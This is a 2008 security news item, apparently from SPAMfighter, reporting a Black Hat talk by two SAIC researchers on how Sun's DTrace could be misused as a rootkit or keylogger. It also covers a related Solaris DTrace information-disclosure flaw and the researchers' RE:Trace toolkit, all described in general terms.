Researchers Make Sun’s DTrace to Also Work as a Rootkit Tool
DTrace, the software that Sun developed, was primarily to help monitor Sun's Solaris Operating System (OS). But two researchers have shown how it could be turned into a rootkit natured toolkit that could be used for both defensive and offensive security operations.
David Weston and Tiller Beauchamp, two researchers at SAIC, i.e., Science Applications International Corp., an engineering company, presented their results at the Washington-based Black Hat conference during February 18-21, 2008. SCMagazineUS reported this on February 26, 2008.
DTrace, the application, which is an event logging, or powerful tracing, utility integrated to the Solaris OS enables system administrators to watch over multiple functions, including debugging of statistical information, system performance, and analysis of program execution.
According to FrSIRT's claims, the vulnerability detected in Sun Solaris could be the target of local attackers who, by exploiting it, could access sensitive information. The issue is a result of an unknown error within the dynamic tracing layout of Dtrace. This erroneous tracing utility allows a local or non-global user, equipped with either the PRIV_DTRACE_PROC or the PRIV_DTRACE_USER privilege, to successfully carry out kernel-level tracing to be able to access sensitive information.
Although DTrace on its own is not damaging, but when used in combination with certain utilities, it could lead to harmful results. For example, someone could manipulate it to carry out "snooping" operations like intercepting a user's typing on the computer keys without the latter's knowledge, just what a keylogger does, the researchers said.
David Weston described DTrace as a friendly rootkit for it allows the user to view everything that takes place within the framework of an operation. SCMagazineUS reported this.
Weston praised DTrace as an immensely useful platform. But he said that they are mainly looking for a reverse-engineering application, which was missing in DTrace that could not set the conditions for reverse-engineering a program to find vulnerabilities.
In the meantime, Weston and Beauchamp have designed a toolkit, which they named RE:Trace and described as a 'high-level' program tool. This toolkit contains a Ruby wrapper with which the issues with DTrace can be overcome by preventing the latter's destructive actions.
» SPAMfighter News - 01-03-2008